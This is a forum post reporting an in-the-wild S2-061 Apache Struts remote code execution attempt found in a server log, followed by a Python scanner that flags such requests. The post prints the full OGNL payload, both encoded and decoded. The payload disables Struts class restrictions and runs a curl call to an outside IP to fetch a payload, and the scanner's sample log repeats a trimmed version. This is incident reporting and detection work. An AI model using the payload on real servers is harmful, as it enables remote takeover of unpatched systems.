The S2-061 Struts remote code execution vulnerability (CVE-2020-17530) in the WILD

The S2-061 Struts remote code execution vulnerability (CVE-2020-17530) was published on December 08, 2020 by Apache, and it's marked "difficult to weaponize" by most sites I've checked after finding this request. Today, looking at my server logs, I found a 'GET' request with these contents (I won't remove anything; it might help a researcher make sense of it):

"GET /?id=%25%7B%28%27Powered_by_Unicode_Potats0%2Cenjoy_it%27%29.%28%23UnicodeSec+%3D+%23application%5B%27org.apache.tomcat.InstanceManager%27%5D%29.%28%23potats0%3D%23UnicodeSec.newInstance%28%27org.apache.commons.collections.BeanMap%27%29%29.%28%23stackvalue%3D%23attr%5B%27struts.valueStack%27%5D%29.%28%23potats0.setBean%28%23stackvalue%29%29.%28%23context%3D%23potats0.get%28%27context%27%29%29.%28%23potats0.setBean%28%23context%29%29.%28%23sm%3D%23potats0.get%28%27memberAccess%27%29%29.%28%23emptySet%3D%23UnicodeSec.newInstance%28%27java.util.HashSet%27%29%29.%28%23potats0.setBean%28%23sm%29%29.%28%23potats0.put%28%27excludedClasses%27%2C%23emptySet%29%29.%28%23potats0.put%28%27excludedPackageNames%27%2C%23emptySet%29%29.%28%23exec%3D%23UnicodeSec.newInstance%28%27freemarker.template.utility.Execute%27%29%29.%28%23cmd%3D%7B%27curl+93.189.44.137%2Fssa%27%7D%29.%28%23res%3D%23exec.exec%28%23cmd%29%29%7D HTTP/1.0"

Decoding the URL:

{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'curl 93.189.44.137/ssa'}).(#res=#exec.exec(#cmd))}

After decoding it and a little Google search, I found this Chinese site that described the PoC with an example of real exploitation: "https://www.cnblogs.com/potatsoSec/p/14111163.html". With the site having the name "potatso" and the exploit having "potats0", is it a coincidence, or is it a script kiddie who just copied the code and tried hitting anything online? The IP 93[.]189[.]44[.]137 which curl calls is from Russia, though. Researching the exploit, it's marked "difficult to weaponize". I still don't know if this is necessary or if it might help, but I'd say just patch even if it's marked as low risk.

2 Likes
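As an added example (not part of the original post), the decoding step above turned into a small Python log scanner: it URL-decodes each query parameter in access-log lines, flags values wrapped in an OGNL expression, records which S2-061 style markers appear, and pulls out any host a `curl`/`wget` call points at. The log lines and IP addresses are constructed samples from documentation ranges, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# OGNL fragments seen in the decoded request in the post; any one of them
# inside an expression-wrapped parameter is a strong S2-061 indicator.
OGNL_MARKERS = (
    "#application[",
    "struts.valueStack",
    "memberAccess",
    "excludedClasses",
    "excludedPackageNames",
    "freemarker.template.utility.Execute",
)

# Constructed sample lines (common log format). Line 1 carries a trimmed,
# URL-encoded fragment modelled on the request in the post; lines 2 and 3
# are benign (line 3 has the %{...} wrapper but no exploit markers).
SAMPLE_LOG = """\
203.0.113.5 - - [08/Dec/2020:10:00:01 +0000] "GET /?id=%25%7B%28%23UnicodeSec%3D%23application%5B%27org.apache.tomcat.InstanceManager%27%5D%29.%28%23sm%3D%23potats0.get%28%27memberAccess%27%29%29.%28%23potats0.put%28%27excludedClasses%27%2C%23emptySet%29%29.%28%23cmd%3D%7B%27curl+198.51.100.7%2Fssa%27%7D%29%7D HTTP/1.0" 200 512
203.0.113.9 - - [08/Dec/2020:10:00:02 +0000] "GET /?id=42 HTTP/1.1" 200 1024
203.0.113.9 - - [08/Dec/2020:10:00:03 +0000] "GET /search?q=%25%7Bhello%7D HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
CALLBACK_RE = re.compile(r"\b(?:curl|wget)\s+(?:https?://)?([\w.-]+)")


def decode_query(target):
    """Return [(name, decoded_value)] for the query string of a request target."""
    # parse_qsl percent-decodes and turns '+' into a space, exactly the step
    # done by hand in the post.
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan_log(text):
    """Return (client_ip, param, markers_found, callback_hosts) per flagged request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for name, value in decode_query(target):
            if "%{" not in value and "${" not in value:
                continue  # not an OGNL expression wrapper; ignore
            markers = [k for k in OGNL_MARKERS if k in value]
            hits.append((client, name, markers, CALLBACK_RE.findall(value)))
    return hits


if __name__ == "__main__":
    for client, name, markers, hosts in scan_log(SAMPLE_LOG):
        print(f"{client} param={name} markers={markers} callbacks={hosts}")
```

A hit with an empty marker list is worth a look but is much weaker evidence than one naming `memberAccess` or `excludedClasses`, which only make sense in a sandbox-bypass attempt.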